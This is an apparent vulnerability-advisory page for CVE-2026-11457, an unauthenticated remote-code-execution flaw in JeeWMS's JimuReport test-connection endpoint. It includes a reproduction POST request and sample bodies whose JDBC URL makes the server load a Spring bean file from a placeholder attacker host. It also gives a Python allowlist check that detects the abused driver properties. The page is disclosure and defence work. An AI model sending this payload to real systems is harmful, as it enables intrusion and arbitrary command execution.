VYPR
High severity · 7.3 · NVD Advisory · Published Jun 7, 2026

CVE-2026-11457

Description

JEEWMS JimuReport test-connection endpoint allows unauthenticated RCE via JDBC connection parameter manipulation.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A security flaw exists in erzhongxmu JeeWMS up to commit 141740afb2ba14d441c82a833d0a418d07ca2d69 in the /base-boot/jmreport/testConnection endpoint of the bundled JimuReport component. The endpoint is reachable without authentication because the Shiro filter chain marks /jmreport/** as anonymous. The flaw is that the JDBC connection parameters supplied in the request (dbType, dbDriver, dbUrl, dbUsername and dbPassword) are passed straight to the driver to open a database connection, so the caller chooses both the driver class and the full connection URL.

Exploitation

An unauthenticated remote attacker sends a crafted POST request with a JSON body to /base-boot/jmreport/testConnection. The dbUrl is a PostgreSQL JDBC URL carrying the driver properties socketFactory and socketFactoryArg: the PostgreSQL driver instantiates the class named in socketFactory by reflection and passes socketFactoryArg to its String constructor. Naming org.springframework.context.support.ClassPathXmlApplicationContext with an http:// URL as the argument makes the application fetch and load a remote Spring XML bean definition, and the beans it declares are instantiated on the server, which is enough to execute arbitrary commands. This is the instantiation path that the PostgreSQL JDBC driver tightened for CVE-2022-21724 (fixed in pgjdbc 42.2.25 and 42.3.2, which require the named class to actually be a SocketFactory), so the driver version bundled with the application determines whether this particular gadget works; the endpoint still hands an attacker-chosen driver class and connection URL to the driver either way.

Impact

Successful exploitation of this vulnerability allows an unauthenticated attacker to achieve remote code execution (RCE) on the affected server. The attacker gains the ability to execute arbitrary commands with the privileges of the running application.

Mitigation

The product follows a rolling-release model, and the advisory gives no affected or fixed version. The vendor was contacted but did not respond, and no patched version or workaround is disclosed in the available references. The vendor's website is https://www.huayi-tec.com/ and the source repository is https://gitee.com/erzhongxmu/JEEWMS [1]. Until a fix exists, the exposure can be reduced by removing the anonymous rule for /jmreport/** from the Shiro filter chain (or restricting the endpoint to administrators), validating dbType, dbDriver and dbUrl against an allowlist before they reach DriverManager, and blocking outbound HTTP from the application host so a remote bean definition cannot be fetched; these are general hardening measures, not vendor guidance.

AI Insight generated on Jun 7, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"The JimuReport test-connection endpoint accepts and uses attacker-controlled JDBC parameters to establish database connections, leading to arbitrary class instantiation and potential remote code execution."

Attack vector

An unauthenticated attacker sends a POST request to /base-boot/jmreport/testConnection with a JSON body carrying the JDBC connection parameters (dbType, dbDriver, dbUrl and dbPassword). Setting dbUrl to a PostgreSQL JDBC URL with the socketFactory and socketFactoryArg properties drives the driver down a class-loading and object-instantiation path that the attacker controls, which leads to remote code execution [1].

Affected code

The vulnerable code is the /base-boot/jmreport/testConnection endpoint in the JimuReport component. The Shiro configuration explicitly marks /jmreport/** as anonymous, so the endpoint is reachable without authentication [1], and it passes the supplied dbType, dbDriver and dbUrl directly to the database connection test.

What the fix does

The advisory does not specify any patches or fixes. It notes that the vendor was contacted but did not respond. Therefore, no remediation guidance is available, and the vulnerability remains unaddressed by the vendor.

Preconditions

  • auth: no authentication is required to reach the vulnerable endpoint [1].
  • input: the attacker must control the dbType, dbDriver and dbUrl parameters in the request body [1].
  • network: the attacker must have network access to the target server.

Reproduction

POST /base-boot/jmreport/testConnection HTTP/1.1
Host: <target>
Content-Type: application/json

{
  "dbType": "postgresql",
  "dbDriver": "org.postgresql.Driver",
  "dbUrl": "jdbc:postgresql://<attacker-host>:5432/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://<attacker-host>:8081/bean.xml"
}
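The request above shows what the endpoint accepts. The check below is an added example, written for this page and not taken from JeeWMS or JimuReport, of the allowlist validation the Exploitation and Mitigation sections call for: it parses a dbUrl, flags the PostgreSQL driver properties that name a class to instantiate or a file to open (socketFactory, socketFactoryArg and their sslFactory, logger and authentication-plugin relatives), and rejects a testConnection body whose driver, subprotocol or host is not allowlisted. The parameter names follow the advisory; the allowlisted drivers and hosts, and the sample request bodies, are assumptions constructed for the example. Because the same function can be run over logged request bodies, it doubles as a detector for attempts against an unpatched instance.

```python
"""Added example (not JeeWMS/JimuReport code): allowlist check for a
testConnection-style request body, usable both as a server-side guard and as
a detector over logged bodies. Allowlists and sample bodies are assumptions."""
from urllib.parse import parse_qs, urlsplit

# PostgreSQL JDBC driver properties that name a class the driver instantiates
# by reflection, or a file/URL it opens. Keys are compared case-insensitively
# to be conservative; percent-encoded keys are decoded by parse_qs first.
DANGEROUS_PG_PARAMS = {
    "socketfactory", "socketfactoryarg",
    "sslfactory", "sslfactoryarg",
    "sslhostnameverifier", "sslpasswordcallback",
    "authenticationpluginclassname",
    "loggerlevel", "loggerfile",
}

# Assumed deployment allowlists: one driver class per dbType, and the only
# database hosts the application is permitted to reach.
ALLOWED_DRIVERS = {
    "mysql": "com.mysql.cj.jdbc.Driver",
    "postgresql": "org.postgresql.Driver",
}
ALLOWED_DB_HOSTS = {"db.internal", "127.0.0.1"}


def parse_jdbc_url(db_url: str):
    """Split a jdbc:<subprotocol>://host[:port]/db?k=v URL into
    (subprotocol, host, params). Raises ValueError for anything else."""
    if not db_url.startswith("jdbc:"):
        raise ValueError("not a jdbc URL")
    subprotocol, sep, remainder = db_url[len("jdbc:"):].partition(":")
    if not sep or not remainder.startswith("//"):
        raise ValueError("unsupported jdbc URL form")
    parts = urlsplit(subprotocol + ":" + remainder)
    params = {k.lower(): v for k, v in
              parse_qs(parts.query, keep_blank_values=True).items()}
    return subprotocol.lower(), (parts.hostname or "").lower(), params


def find_dangerous_params(db_url: str):
    """Lower-cased names of dangerous driver properties found in db_url."""
    _, _, params = parse_jdbc_url(db_url)
    return sorted(k for k in params if k in DANGEROUS_PG_PARAMS)


def validate_test_connection(body: dict):
    """Checks a testConnection body must pass before its parameters are
    handed to the JDBC driver. Returns (ok, reason)."""
    db_type = str(body.get("dbType", "")).lower()
    if db_type not in ALLOWED_DRIVERS:
        return False, f"dbType {db_type!r} not allowed"
    if body.get("dbDriver") != ALLOWED_DRIVERS[db_type]:
        return False, "dbDriver does not match dbType"
    try:
        subprotocol, host, params = parse_jdbc_url(str(body.get("dbUrl", "")))
    except ValueError as exc:
        return False, f"bad dbUrl: {exc}"
    if subprotocol != db_type:
        return False, "dbUrl subprotocol does not match dbType"
    if host not in ALLOWED_DB_HOSTS:
        return False, f"host {host!r} not allowed"
    bad = sorted(k for k in params if k in DANGEROUS_PG_PARAMS)
    if bad:
        return False, "dangerous driver properties: " + ", ".join(bad)
    return True, "ok"


# Constructed sample bodies (not captured traffic): the advisory's reproduction
# payload with placeholder hosts filled in, a benign request to the internal
# database, and an allowed host that still carries the dangerous properties.
SAMPLE_BODIES = [
    {"dbType": "postgresql", "dbDriver": "org.postgresql.Driver",
     "dbUrl": "jdbc:postgresql://attacker.example:5432/test"
              "?socketFactory=org.springframework.context.support."
              "ClassPathXmlApplicationContext"
              "&socketFactoryArg=http://attacker.example:8081/bean.xml"},
    {"dbType": "postgresql", "dbDriver": "org.postgresql.Driver",
     "dbUrl": "jdbc:postgresql://db.internal:5432/wms?ssl=true"},
    {"dbType": "postgresql", "dbDriver": "org.postgresql.Driver",
     "dbUrl": "jdbc:postgresql://db.internal:5432/wms"
              "?socketFactory=java.lang.Object&socketFactoryArg=x"},
]


def triage(bodies):
    """Run the guard over a batch of bodies (e.g. replayed from access logs)."""
    return [validate_test_connection(b) for b in bodies]


if __name__ == "__main__":
    for body, (ok, reason) in zip(SAMPLE_BODIES, triage(SAMPLE_BODIES)):
        print("ALLOW" if ok else "BLOCK", body["dbUrl"][:50], "-", reason)
```

The host check fires before the property check, so the reproduction payload is blocked on its attacker host alone; the third sample shows that an allowlisted host does not excuse dangerous properties. The list of dangerous properties is deliberately broader than the two named in the advisory, since any property the driver turns into a class name or a file path is the same class of problem.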

References: 5

News mentions: 0 (no linked articles in our index yet)